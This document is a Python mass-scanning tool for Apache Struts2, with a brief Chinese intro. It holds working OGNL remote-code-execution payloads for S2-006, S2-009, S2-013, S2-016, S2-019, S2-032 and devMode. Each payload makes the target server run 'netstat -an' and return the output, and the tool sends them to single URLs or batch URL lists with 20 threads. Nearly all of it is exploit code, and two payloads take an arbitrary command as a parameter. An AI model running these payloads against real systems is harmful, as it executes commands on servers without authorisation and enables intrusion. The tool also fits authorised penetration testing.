仅为 POC（只验证漏洞是否存在，不做进一步利用），再根据结果用 EXP 进一步测试；

支持 -u 指定单个 URL；-f 从文本文件批量导入 URL（每行一个）

URL 列表中每行一个完整 URL（含协议），例如 https://www.baidu.com；空行和以 # 开头的行会被忽略

#! /usr/bin/env python
# -*-coding:utf-8-*-
import getopt
import logging
import os
import sys
try:
    import Queue  # Python 2
except ImportError:  # Python 3
    import queue as Queue

import requests
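import threading

# NOTE: every probe below is an *active* check. Each payload makes the target
# execute `netstat -an` (one variant `netstat -ano`) and echo the output into
# the HTTP response; that is remote code execution, not a passive fingerprint.
# Only run this against systems you are authorised to test.

logging.basicConfig(
    level=logging.WARNING,
    format="[%(asctime)s] %(message)s"
)

# Substring of `netstat -an` output that the probes look for in the response
# body; finding it means the injected command ran on the target.
MARKER = "0.0.0.0"

# Per-request timeout in seconds (connect + read), as in the original probes.
TIMEOUT = 10

# File that confirmed hits are appended to (one line per URL).
RESULTS_FILE = "vuls.txt"

# Serialises appends to RESULTS_FILE; several BatchThreads workers may hit
# the same file at the same time.
_results_lock = threading.Lock()


def response_shows_exec(body):
    """Return True if *body* (response text, or None) contains MARKER.

    This is a plain substring match: a page that legitimately contains the
    text "0.0.0.0" will register as a hit, so treat results as leads to be
    confirmed by hand, not as proof.
    """
    return body is not None and MARKER in body


def send_probe(tag, method, url, **kwargs):
    """Send one probe request and return *tag* if the target ran the command.

    Args:
        tag: label returned on a hit, e.g. "s2-016".
        method: HTTP method name ("get" or "post"), case-insensitive.
        url: full request URL (query-string payloads already appended).
        **kwargs: forwarded to requests (data=, headers=). ``timeout``
            defaults to TIMEOUT.

    Returns:
        *tag* when the response body contains MARKER, else None. None is also
        returned when the request itself fails (connection refused, timeout,
        TLS error, ...); any other exception propagates to the caller.
    """
    kwargs.setdefault("timeout", TIMEOUT)
    try:
        resp = requests.request(method.upper(), url, **kwargs)
    except requests.RequestException as err:
        logging.debug("%s probe to %s failed: %s", tag, url, err)
        return None
    # resp.text rather than resp.content: under Python 3 .content is bytes,
    # and `str in bytes` raises TypeError -- which the old bare `except:`
    # turned into a silent "not vulnerable" for every target.
    return tag if response_shows_exec(resp.text) else None


def struts2_006(url):
    """S2-006 check: POST an OGNL payload as a form body that runs
    `netstat -an` and prints its output into the response.

    Returns "s2-006" on a hit, else None.
    """
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    exp = '''('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'netstat -an\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))'''
    return send_probe("s2-006", "post", url, data=exp, headers=headers)


def struts2_009(url):
    """S2-009 check: GET with the OGNL payload in the query string
    (``class.classLoader.jarPath`` parameter).

    Returns "s2-009" on a hit, else None.
    """
    exp = '''?class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]'''
    return send_probe("s2-009", "get", url + exp)


def struts2_013(url):
    """S2-013 check: POST a form field ``a=1${...}`` whose value is the OGNL
    payload.

    Returns "s2-013" on a hit, else None.
    """
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    exp = '''a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%23a=@java.lang.Runtime@getRuntime().exec('netstat -an').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}'''
    return send_probe("s2-013", "post", url, data=exp, headers=headers)


def struts2_016(url):
    """S2-016 check: GET with a ``redirect:`` action prefix carrying the OGNL
    payload in the query string.

    Returns "s2-016" on a hit, else None.
    """
    exp = '''?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%20%7B'netstat','-an'%7D)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader%20(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println%20(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D'''
    return send_probe("s2-016", "get", url + exp)


def struts2_016_multipart_formdata__special(url):
    """S2-016 check, multipart variant: the OGNL payload is placed in a
    multipart form-field *name* (``method:...``).

    Unlike the other probes this one runs ``netstat -ano`` (Windows-style
    flag); the marker check is the same. Returns "s2-016" on a hit, else None.
    """
    headers = {
        "Accept-Encoding": "gzip, deflate",
        "Connection": " Keep-Alive",
        "Cookie": "",
        "Content-Type": "multipart/form-data; boundary=------------------------4a606c052a893987",
    }
    exp = '''--------------------------4a606c052a893987\r\nContent-Disposition: form-data; name="method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&cmd=netstat -ano&pp=\\A&ppp= &encoding=UTF-8"\r\n\r\n-1\r\n--------------------------4a606c052a893987--'''
    return send_probe("s2-016", "post", url, data=exp, headers=headers)


def struts2_019(url):
    """S2-019 check: ``debug=command&expression=...`` OGNL payload.

    NOTE(review): as in the original, the payload is appended to the URL
    without a ``?`` separator *and* sent as the POST body; kept unchanged --
    confirm which placement is actually intended. Returns "s2-019" on a hit,
    else None.
    """
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    exp = '''debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'netstat','-an'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read(#e),#resp.println(#e),#resp.close()'''
    return send_probe("s2-019", "post", url + exp, data=exp, headers=headers)


def struts2_032(url):
    """S2-032 check: GET with a ``method:`` action prefix carrying the OGNL
    payload in the query string.

    Returns "s2-032" on a hit, else None.
    """
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    exp = '''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=netstat%20-an&pp=\\A&ppp=%20&encoding=UTF-8'''
    return send_probe("s2-032", "get", url + exp, headers=headers)


def struts2_devmode(url):
    """devMode check: GET ``debug=browser&object=...`` with the OGNL payload
    in the query string.

    Returns "s2-devmode" on a hit, else None.
    """
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    exp = '''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=netstat -an'''
    return send_probe("s2-devmode", "get", url + exp, headers=headers)


def struts2_all(url):
    """Run every probe against *url*, stopping at the first hit.

    Probe order (highest-numbered check first) is the same as the original
    ``or`` chain. A hit is appended to RESULTS_FILE as
    ``<url> is struts2 <tag> vulnerable!``; the append is guarded by a lock
    because worker threads call this concurrently.
    """
    logging.warning("trying %s", url)
    probes = (
        struts2_devmode,
        struts2_032,
        struts2_019,
        struts2_016_multipart_formdata__special,
        struts2_016,
        struts2_013,
        struts2_009,
        struts2_006,
    )
    res = None
    for probe in probes:
        res = probe(url)
        if res:
            break
    if res:
        with _results_lock:
            with open(RESULTS_FILE, "a") as f:
                f.write("%s is struts2 %s vulnerable!\n" % (url, res))


class BatchThreads(threading.Thread):
    """Worker that pulls URLs from a shared Queue and scans each one."""

    def __init__(self, queue):
        super(BatchThreads, self).__init__()
        self.queue = queue

    def run(self):
        while True:
            # get_nowait() instead of empty()+get(): with several workers the
            # empty() check races, and the loser blocks forever on get().
            try:
                url = self.queue.get_nowait()
            except Queue.Empty:
                return
            try:
                struts2_all(url)
            except Exception:
                # One failing target must not kill the worker; the old bare
                # `except: break` silently dropped every URL left in the queue.
                logging.exception("error while scanning %s", url)


def load_urls(path):
    """Read target URLs from *path*: one per line, surrounding whitespace
    stripped, blank lines and lines starting with ``#`` skipped.

    Returns a set, so a URL listed twice is scanned once.
    """
    with open(path) as f:
        stripped = [line.strip() for line in f]
    return set(url for url in stripped if url and not url.startswith("#"))


def batch_queue(_file, _queue, _thread_number):
    """Scan every URL listed in *_file* with up to *_thread_number* workers.

    URLs are pushed onto *_queue* and BatchThreads workers drain it; the
    call returns when all workers have finished. Never starts more workers
    than there are URLs. (The original consulted module-level ``queue`` and
    ``threads`` globals instead of its own parameters, and the threshold
    logic could start *more* workers than requested.)
    """
    urls = load_urls(_file)
    if not urls:
        logging.warning("no targets found in %s", _file)
        return
    for url in urls:
        _queue.put(url)
    worker_count = min(_thread_number, _queue.qsize())
    workers = [BatchThreads(_queue) for _ in range(worker_count)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()


def usage():
    """Print command-line help. (The original listed ``-h`` for single-host
    mode, but the option actually parsed is ``-u``.)"""
    print('''Usage: python %s [option]
All Struts2 Vulnerable Test
  -u <url>   scan a single host
  -f <file>  scan from a file (one URL per line)
''' % os.path.basename(sys.argv[0]))


if __name__ == '__main__':
    # Exit non-zero on usage errors (the original's exit(usage()) exited 0).
    if not sys.argv[1:]:
        usage()
        sys.exit(1)
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'u:f:')
    except getopt.GetoptError:
        usage()
        sys.exit(1)
    work_queue = Queue.Queue()
    thread_number = 20
    for name, value in opts:
        if name == '-u':
            struts2_all(value)
        elif name == '-f':
            batch_queue(value, work_queue, thread_number)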

update
